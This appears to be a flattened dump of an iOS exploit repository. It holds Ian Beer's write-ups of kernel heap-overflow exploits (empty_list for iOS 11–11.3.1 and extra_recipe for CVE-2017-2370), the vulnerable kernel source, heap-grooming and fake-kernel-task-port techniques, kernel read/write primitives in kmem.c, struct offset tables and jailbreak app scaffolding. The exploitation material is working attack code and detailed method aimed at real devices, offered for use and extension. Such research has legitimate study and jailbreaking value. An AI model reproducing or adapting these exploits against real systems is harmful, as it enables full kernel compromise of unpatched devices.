datastructure where 0 is an interesting value to change something to 50 | 51 | In the end I chose the first option. There are then two further requirements: 52 | * target needs a reference count in the first 8 bytes 53 | * target has to be overflowable into from kalloc.16 54 | 55 | I chose to target struct ipc_port, which has a reference count field as its second dword thus fulfilling the 56 | first requirement. It is however not allocated in kalloc.16; instead it lives in its own zone (ipc_ports.) 57 | 58 | This means we have to aligned a kalloc.16 zone block just before an ipc_ports one, then overflow out of the 59 | last kalloc.16 allocation in the kalloc.16 block into the first on in ipc_ports. 60 | 61 | There are two tricks we can use to make this easier: 62 | 1) freelist reversal 63 | 2) safely-overflowable allocations 64 | 65 | Freelist Reversal: 66 | zone allocations will come first from intermediate (partially full) pages. This means that if we just start free'ing and 67 | allocating k.16 objects somewhere in the middle of the groom they won't be re-used until 68 | the current intermediate page is either full or empty. 69 | 70 | this provides a challenge because fresh page's freelist's are filled semi-randomly such that 71 | their allocations will go from the inside to the outside: 72 | 73 | | 9 8 6 5 2 1 3 4 7 10 | <-- example "randomized" allocation order from a fresh all-free page 74 | 75 | this means that our final intermediate k.16 and ports pages will look a bit like this: 76 | 77 | | - - - 5 2 1 3 4 - - | - - - 4 1 2 3 5 - - | 78 | kalloc.16 ipc_ports 79 | 80 | if we use the overflow to corrupt a freelist entry we'll panic if it gets allocated, so we 81 | need to avoid that 82 | 83 | the trick is that by controlling the allocation and free order we can reverse the freelists such that 84 | the final intermediate pages will look more like this: 85 | | 1 4 - - - - - 5 3 2 | 2 5 - - - - - 4 3 1 | 86 | kalloc.16 ipc_ports 87 | 88 | at this point we're much more likely to be able to free a kalloc.16 and realloc it for the overflow 89 | such that we can hit the first qword of an ipc_port. 90 | 91 | Safely-Overflowable allocations: 92 | since there are likely to be many candidate allocations we're gonna have to overflow out of before we hit the 93 | target one (which is right at the end, just before the ipc_port) we need to make sure that the allocated objects 94 | on the kalloc.16 page are safe to corrupt with a NULL pointer. 95 | 96 | I use mach message ool_port descriptors for this, as NULL is a valid value. 97 | 98 | Exploit Flow: 99 | We do the groom to reverse the kalloc.16 freelists and start trying to overflow into an ipc_port. 100 | 101 | We know the approximate range of mach port names which contain the to-be-corrupted port; after each overflow attempt 102 | we check each of these ports to see if the port was corrupted. A side-effect of successful corruption is that the 103 | port's io_active flag will be set to zero. We can detect this without causing side-effects using the 104 | mach_port_kobject MIG method. 105 | 106 | Once we find the corrupted port we need to cause a reference to be taken and dropped on it; and more importantly we 107 | need the code path which does this to not check the io_active flag. mach_port_set_attributes will do this for us. 108 | 109 | Now we've turned our NULL pointer write off the end of a kalloc.16 into a dangling mach port :) 110 | 111 | We cause a zone gc, aiming to get the port's memory reused as a kalloc.4096 page. We first get it reused as a ool_ports 112 | descriptor where the ip_context field overlaps with a send right we send ourselves to a canary port. This lets us 113 | learn the approximate address of our objects in the kernel. We then replace the ool_desc with a pipe buffer, 114 | and with a bit of fiddling are able to work out where the dangling mach port is in memory. 115 | 116 | We craft a fake kernel task port in there then clean up. 117 | 118 | Reliability: 119 | The exploit does work, which was my goal :) Reliablilty is something like 30% maybe, it all hinges on how quickly you can do the initial overflow 120 | and test loop. If something else comes in and allocates or frees in kalloc.16 you increase the probability that you 121 | corrupt a freelist entry or something else and will panic. 122 | 123 | I'm sure the exploit can be made more reliable; I've only got it to the point where I've demonstrated that this 124 | bug is exploitable. If you want to take this as a starting point and demonstrate how to improve reliability I'd love 125 | to read a blog post! I imagine this would involve actually monitoring kalloc.16 allocations and understanding what 126 | the failure cases are and how they can be prevented. 127 | 128 | Success rates seem to be highest when the device has been rebooted and left idle for a bit. 129 | 130 | Cleanup: 131 | If the exploit does work it should clean up after itself and not panic the device. The fake kernel task port will stay alive. 132 | 133 | Use the functions in kmem.h to read and write kernel memory. Persist a send-right to tfp0 in there if you want to keep 134 | kernel memory access after this process exits. 135 | 136 | I've tested on: iPod Touch 6G, iPhone 6S, iPhone SE, iPhone 7, iPhone 8 137 | It should work on iOS 11 through iOS 11.3.1 138 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/ViewController.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface ViewController : UIViewController 4 | 5 | 6 | @end 7 | 8 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/ViewController.m: -------------------------------------------------------------------------------- 1 | #import "ViewController.h" 2 | 3 | @interface ViewController () 4 | 5 | @end 6 | 7 | @implementation ViewController 8 | 9 | - (void)viewDidLoad { 10 | [super viewDidLoad]; 11 | // Do any additional setup after loading the view, typically from a nib. 12 | } 13 | 14 | 15 | - (void)didReceiveMemoryWarning { 16 | [super didReceiveMemoryWarning]; 17 | // Dispose of any resources that can be recreated. 18 | } 19 | 20 | 21 | @end 22 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/kmem.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "kmem.h" 7 | 8 | 9 | // Just setting a global var 10 | mach_port_t tfp0 = MACH_PORT_NULL; 11 | void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0) { 12 | tfp0 = fake_tfp0; 13 | } 14 | 15 | void wk32(uint64_t kaddr, uint32_t val) { 16 | if (tfp0 == MACH_PORT_NULL) { 17 | printf("attempt to write to kernel memory before any kernel memory write primitives available\n"); 18 | sleep(3); 19 | return; 20 | } 21 | 22 | kern_return_t err; 23 | err = mach_vm_write(tfp0, 24 | (mach_vm_address_t)kaddr, 25 | (vm_offset_t)&val, 26 | (mach_msg_type_number_t)sizeof(uint32_t)); 27 | 28 | if (err != KERN_SUCCESS) { 29 | printf("tfp0 write failed: %s %x\n", mach_error_string(err), err); 30 | return; 31 | } 32 | } 33 | 34 | void wk64(uint64_t kaddr, uint64_t val) { 35 | uint32_t lower = (uint32_t)(val & 0xffffffff); 36 | uint32_t higher = (uint32_t)(val >> 32); 37 | wk32(kaddr, lower); 38 | wk32(kaddr+4, higher); 39 | } 40 | 41 | uint32_t rk32(uint64_t kaddr) { 42 | kern_return_t err; 43 | uint32_t val = 0; 44 | mach_vm_size_t outsize = 0; 45 | err = mach_vm_read_overwrite(tfp0, 46 | (mach_vm_address_t)kaddr, 47 | (mach_vm_size_t)sizeof(uint32_t), 48 | (mach_vm_address_t)&val, 49 | &outsize); 50 | if (err != KERN_SUCCESS){ 51 | printf("tfp0 read failed %s addr: 0x%llx err:%x port:%x\n", mach_error_string(err), kaddr, err, tfp0); 52 | sleep(3); 53 | return 0; 54 | } 55 | 56 | if (outsize != sizeof(uint32_t)){ 57 | printf("tfp0 read was short (expected %lx, got %llx\n", sizeof(uint32_t), outsize); 58 | sleep(3); 59 | return 0; 60 | } 61 | return val; 62 | } 63 | 64 | uint64_t rk64(uint64_t kaddr) { 65 | uint64_t lower = rk32(kaddr); 66 | uint64_t higher = rk32(kaddr+4); 67 | uint64_t full = ((higher<<32) | lower); 68 | return full; 69 | } 70 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/kmem.h: -------------------------------------------------------------------------------- 1 | #ifndef kmem_h 2 | #define kmem_h 3 | 4 | #include 5 | 6 | kern_return_t mach_vm_read( 7 | vm_map_t target_task, 8 | mach_vm_address_t address, 9 | mach_vm_size_t size, 10 | vm_offset_t *data, 11 | mach_msg_type_number_t *dataCnt); 12 | 13 | kern_return_t mach_vm_write( 14 | vm_map_t target_task, 15 | mach_vm_address_t address, 16 | vm_offset_t data, 17 | mach_msg_type_number_t dataCnt); 18 | 19 | kern_return_t mach_vm_read_overwrite( 20 | vm_map_t target_task, 21 | mach_vm_address_t address, 22 | mach_vm_size_t size, 23 | mach_vm_address_t data, 24 | mach_vm_size_t *outsize); 25 | 26 | extern mach_port_t tfp0; 27 | 28 | uint32_t rk32(uint64_t kaddr); 29 | uint64_t rk64(uint64_t kaddr); 30 | 31 | void wk32(uint64_t kaddr, uint32_t val); 32 | void wk64(uint64_t kaddr, uint64_t val); 33 | 34 | void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0); 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/main.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "AppDelegate.h" 3 | 4 | int main(int argc, char * argv[]) { 5 | @autoreleasepool { 6 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/offsets.h: -------------------------------------------------------------------------------- 1 | #ifndef offsets_h 2 | #define offsets_h 3 | 4 | enum kstruct_offset { 5 | /* struct task */ 6 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 7 | KSTRUCT_OFFSET_TASK_REF_COUNT, 8 | KSTRUCT_OFFSET_TASK_ACTIVE, 9 | KSTRUCT_OFFSET_TASK_VM_MAP, 10 | KSTRUCT_OFFSET_TASK_NEXT, 11 | KSTRUCT_OFFSET_TASK_PREV, 12 | KSTRUCT_OFFSET_TASK_ITK_SPACE, 13 | KSTRUCT_OFFSET_TASK_BSD_INFO, 14 | 15 | /* struct ipc_port */ 16 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 17 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 18 | KSTRUCT_OFFSET_IPC_PORT_WAITQ_FLAGS, 19 | KSTRUCT_OFFSET_IPC_PORT_SET_ID, 20 | KSTRUCT_OFFSET_IPC_PORT_WAITQ_NEXT, 21 | KSTRUCT_OFFSET_IPC_PORT_WAITQ_PREV, 22 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 23 | KSTRUCT_OFFSET_IPC_PORT_RECEIVER_NAME, 24 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 25 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 26 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 27 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 28 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 29 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 30 | 31 | /* struct proc */ 32 | KSTRUCT_OFFSET_PROC_PID, 33 | KSTRUCT_OFFSET_PROC_P_FD, 34 | 35 | /* struct filedesc */ 36 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES, 37 | 38 | /* struct fileproc */ 39 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB, 40 | 41 | /* struct fileglob */ 42 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA, 43 | 44 | /* struct socket */ 45 | KSTRUCT_OFFSET_SOCKET_SO_PCB, 46 | 47 | /* struct pipe */ 48 | KSTRUCT_OFFSET_PIPE_BUFFER, 49 | 50 | /* struct ipc_space */ 51 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE, 52 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE, 53 | 54 | KFREE_ADDR_OFFSET, 55 | }; 56 | 57 | int koffset(enum kstruct_offset offset); 58 | void offsets_init(void); 59 | 60 | #endif 61 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/offsets.m: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "offsets.h" 10 | 11 | int* offsets = NULL; 12 | 13 | int kstruct_offsets[] = { 14 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 15 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT, 16 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE, 17 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP, 18 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT, 19 | 0x30, // KSTRUCT_OFFSET_TASK_PREV, 20 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE 21 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO, 22 | 23 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 24 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 25 | 0x10, // KSTRUCT_OFFSET_IPC_PORT_WAITQ_FLAGS, 26 | 0x18, // KSTRUCT_OFFSET_IPC_PORT_SET_ID, 27 | 0x30, // KSTRUCT_OFFSET_IPC_PORT_WAITQ_NEXT 28 | 0x38, // KSTRUCT_OFFSET_IPC_PORT_WAITQ_PREV 29 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 30 | 0x4c, // KSTRUCT_OFFSET_IPC_PORT_RECEIVER_NAME 31 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 32 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 33 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 34 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 35 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 36 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 37 | 38 | 0x10, // KSTRUCT_OFFSET_PROC_PID, 39 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD 40 | 41 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES 42 | 43 | 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB 44 | 45 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA 46 | 47 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB 48 | 49 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER 50 | 51 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE 52 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE 53 | 54 | 0x6c, // KFREE_ADDR_OFFSET 55 | }; 56 | 57 | 58 | int koffset(enum kstruct_offset offset) { 59 | if (offsets == NULL) { 60 | printf("need to call offsets_init() prior to querying offsets\n"); 61 | return 0; 62 | } 63 | return offsets[offset]; 64 | } 65 | 66 | // Checking iOS version 67 | void offsets_init() { 68 | if (@available(iOS 11.4, *)) { 69 | printf("this bug is patched in iOS 11.4 and above\n"); 70 | exit(EXIT_FAILURE); 71 | } else if (@available(iOS 11.0, *)) { 72 | printf("offsets selected for iOS 11.0 to 11.3.1\n"); 73 | offsets = kstruct_offsets; 74 | } else { 75 | printf("iOS version too low, 11.0 required\n"); 76 | exit(EXIT_FAILURE); 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/sploit.h: -------------------------------------------------------------------------------- 1 | #ifndef sploit_h 2 | #define sploit_h 3 | 4 | void vfs_sploit(void); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/README.md: -------------------------------------------------------------------------------- 1 | A jailbreak. 2 | 3 | ##### Howto: 4 | 5 | Clean reboot the device, wait for a couple of minutes, start extra_recipe, wait for 5 seconds or so, then hit "go". 6 | If it says "failed, reboot" you should really reboot. Re-trying the same app will most likely encounter a kernel panic somewhere down the road. 7 | 8 | ##### Support: 9 | 10 | | Device | Version | 11 | |---------|----------| 12 | | iPhone 7/+ | iOS 10.0.0 -> iOS 10.1.1 | 13 | | iPhone 6S/+ (TSMC) | iOS 10.2 | 14 | | iPad Air 2 | iOS 10.2 | 15 | | iPad Mini 3 (WiFi) | iOS 10.2 | 16 | | iPhone 6 | iOS 10.2 | 17 | 18 | ##### Credits: 19 | 20 | * Ian Beer for the amazingly simple, yet awesome, kernel exploit 21 | * @qwertyoruiop for the amazingly complicated, yet effective, memprot bypass 22 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/extra_recipe.xcscheme: -------------------------------------------------------------------------------- 1 | 2 | 5 | 8 | 9 | 15 | 21 | 22 | 23 | 24 | 25 | 30 | 31 | 32 | 33 | 39 | 40 | 41 | 42 | 43 | 44 | 54 | 56 | 62 | 63 | 64 | 65 | 66 | 67 | 73 | 75 | 81 | 82 | 83 | 84 | 86 | 87 | 90 | 91 | 92 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | extra_recipe.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | SuppressBuildableAutocreation 14 | 15 | B0F37BBC1E361EAD00179E85 16 | 17 | primary 18 | 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/0.reload.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | 0.reload 7 | ProgramArguments 8 | 9 | /usr/libexec/reload 10 | 11 | RunAtLoad 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/AppDelegate.swift: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.swift 3 | // extra_recipe 4 | // 5 | // Created by Ian Beer on 1/23/17. 6 | // Copyright © 2017 Ian Beer. All rights reserved. 7 | // 8 | 9 | import UIKit 10 | 11 | @UIApplicationMain 12 | class AppDelegate: UIResponder, UIApplicationDelegate { 13 | 14 | var window: UIWindow? 15 | 16 | 17 | func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) -> Bool { 18 | // Override point for customization after application launch. 19 | return true 20 | } 21 | 22 | func applicationWillResignActive(_ application: UIApplication) { 23 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 24 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 25 | } 26 | 27 | func applicationDidEnterBackground(_ application: UIApplication) { 28 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 29 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 30 | } 31 | 32 | func applicationWillEnterForeground(_ application: UIApplication) { 33 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 34 | } 35 | 36 | func applicationDidBecomeActive(_ application: UIApplication) { 37 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 38 | } 39 | 40 | func applicationWillTerminate(_ application: UIApplication) { 41 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 42 | } 43 | 44 | 45 | } 46 | 47 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "29x29", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "29x29", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "40x40", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "40x40", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "60x60", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "60x60", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "ipad", 35 | "size" : "29x29", 36 | "scale" : "1x" 37 | }, 38 | { 39 | "idiom" : "ipad", 40 | "size" : "29x29", 41 | "scale" : "2x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "40x40", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "40x40", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "76x76", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "76x76", 61 | "scale" : "2x" 62 | } 63 | ], 64 | "info" : { 65 | "version" : 1, 66 | "author" : "xcode" 67 | } 68 | } -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 29 | 37 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | en 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/README: -------------------------------------------------------------------------------- 1 | // ianbeer 2 | 3 | kernel arbitrary read/write exploit for CVE-2017-2370 for iOS 10.2 4 | 5 | Only tested on iPod Touch 6G 14C92 - other devices/firmwares will not work out of the box! 6 | 7 | *** the bug *** 8 | mach_voucher_extract_attr_recipe_trap is a mach trap which can be called from any context. It's brand new code, added in iOS 10. 9 | 10 | kern_return_t 11 | mach_voucher_extract_attr_recipe_trap(struct mach_voucher_extract_attr_recipe_args *args) 12 | { 13 | ipc_voucher_t voucher = IV_NULL; 14 | kern_return_t kr = KERN_SUCCESS; 15 | mach_msg_type_number_t sz = 0; 16 | 17 | if (copyin(args->recipe_size, (void *)&sz, sizeof(sz))) <---------- (a) 18 | return KERN_MEMORY_ERROR; 19 | 20 | if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE) 21 | return MIG_ARRAY_TOO_LARGE; 22 | 23 | voucher = convert_port_name_to_voucher(args->voucher_name); 24 | if (voucher == IV_NULL) 25 | return MACH_SEND_INVALID_DEST; 26 | 27 | mach_msg_type_number_t __assert_only max_sz = sz; 28 | 29 | if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) { 30 | /* keep small recipes on the stack for speed */ 31 | uint8_t krecipe[sz]; 32 | if (copyin(args->recipe, (void *)krecipe, sz)) { 33 | kr = KERN_MEMORY_ERROR; 34 | goto done; 35 | } 36 | kr = mach_voucher_extract_attr_recipe(voucher, args->key, 37 | (mach_voucher_attr_raw_recipe_t)krecipe, &sz); 38 | assert(sz <= max_sz); 39 | 40 | if (kr == KERN_SUCCESS && sz > 0) 41 | kr = copyout(krecipe, (void *)args->recipe, sz); 42 | } else { 43 | uint8_t *krecipe = kalloc((vm_size_t)sz); <---------- (b) 44 | if (!krecipe) { 45 | kr = KERN_RESOURCE_SHORTAGE; 46 | goto done; 47 | } 48 | 49 | if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) { <----------- (c) 50 | kfree(krecipe, (vm_size_t)sz); 51 | kr = KERN_MEMORY_ERROR; 52 | goto done; 53 | } 54 | 55 | kr = mach_voucher_extract_attr_recipe(voucher, args->key, 56 | (mach_voucher_attr_raw_recipe_t)krecipe, &sz); 57 | assert(sz <= max_sz); 58 | 59 | if (kr == KERN_SUCCESS && sz > 0) 60 | kr = copyout(krecipe, (void *)args->recipe, sz); 61 | kfree(krecipe, (vm_size_t)sz); 62 | } 63 | 64 | kr = copyout(&sz, args->recipe_size, sizeof(sz)); 65 | 66 | done: 67 | ipc_voucher_release(voucher); 68 | return kr; 69 | } 70 | 71 | 72 | Here's the argument structure (controlled from userspace) 73 | 74 | struct mach_voucher_extract_attr_recipe_args { 75 | PAD_ARG_(mach_port_name_t, voucher_name); 76 | PAD_ARG_(mach_voucher_attr_key_t, key); 77 | PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe); 78 | PAD_ARG_(user_addr_t, recipe_size); 79 | }; 80 | 81 | recipe and recipe_size are userspace pointers. 82 | 83 | At point (a) four bytes are read from the userspace pointer recipe_size into sz. 84 | 85 | At point (b) if sz was less than MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) and greater than MACH_VOUCHER_TRAP_STACK_LIMIT (256) 86 | sz is used to allocate a kernel heap buffer. 87 | 88 | At point (c) copyin is called again to copy userspace memory into that buffer which was just allocated, but rather than passing sz (the 89 | validate size which was allocated) args->recipe_size is passed as the size. This is the userspace pointer *to* the size, not the size! 90 | 91 | This leads to a completely controlled kernel heap overflow. Note that the code actually can't work properly :) 92 | 93 | *** the exploit *** 94 | 95 | I target preallocated mach message buffers which are allocated via kalloc. The first 4 bytes are a size field which is used to determine 96 | where in the buffer to read and write a message. By corrupting this field we can cause mach messages to be read and written outside the bounds of 97 | the kalloc allocation backing the kmsg. 98 | 99 | There is a slight complication in that a port's preallocated kmsg will only be used for actual mach_msg sends by the kernel (not for replies 100 | to MIG methods for example.) This makes it a bit trickier to get enough controlled content in them. 101 | 102 | One type of mach message which the kernel sends with a lot of user-controlled data is an exception message, sent when a thread crashes. 103 | 104 | The file load_regs_and_crash.s contains ARM64 assembly which loads the ARM64 general purpose registers with the contents of a buffer 105 | such that when it crashes the exception message contains that data buffer (about 0x70 bytes are controlled.) 106 | 107 | By overwriting the port's ikm_size field to point to the header of another port we can read and write another port's header and learn where it is 108 | in memory. We can then free that second port and reallocate a user client in its place which we can also read and write. 109 | 110 | I read the userclients vtable pointer then use the OSSerializer::serialize gadget technique as detailed in 111 | [https://info.lookout.com/rs/051-ESQ-475/images/pegasus-exploits-technical-details.pdf] to call an arbitrary function with two controlled arguments. 112 | 113 | I call uuid_copy which calls memmove(arg0, arg1, 0x10). By pointing either arg0 or arg1 into the userclient itself (which we can read by receiving the 114 | exception message) we can read and write arbitrary kernel memory in 16 byte chunks. 115 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/ViewController.swift: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.swift 3 | // extra_recipe 4 | // 5 | // Created by Ian Beer on 1/23/17. 6 | // Copyright © 2017 Ian Beer. All rights reserved. 7 | // 8 | 9 | import UIKit 10 | 11 | class ViewController: UIViewController { 12 | 13 | override func viewDidLoad() { 14 | super.viewDidLoad() 15 | //DispatchQueue.main.async(execute: { () -> Void in 16 | // jb_go(); 17 | //}) 18 | } 19 | 20 | 21 | override func didReceiveMemoryWarning() { 22 | super.didReceiveMemoryWarning() 23 | // Dispose of any resources that can be recreated. 24 | } 25 | 26 | @IBAction func bang(_ sender: UIButton) { 27 | var status: String 28 | switch jb_go() { 29 | case 0: 30 | status = "jailbroken" 31 | case 1: 32 | status = "internal error" 33 | case 2: 34 | status = "unsupported" 35 | case 3: 36 | status = "unsupported yet" 37 | case 42: 38 | status = "hmm... ok" 39 | default: 40 | status = "failed, reboot" 41 | } 42 | sender.isEnabled = false 43 | sender.setTitle(status, for: .disabled) 44 | } 45 | 46 | } 47 | 48 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe/bootstrap.tar -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/def.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe/def.plist -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/dex.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | hw 7 | 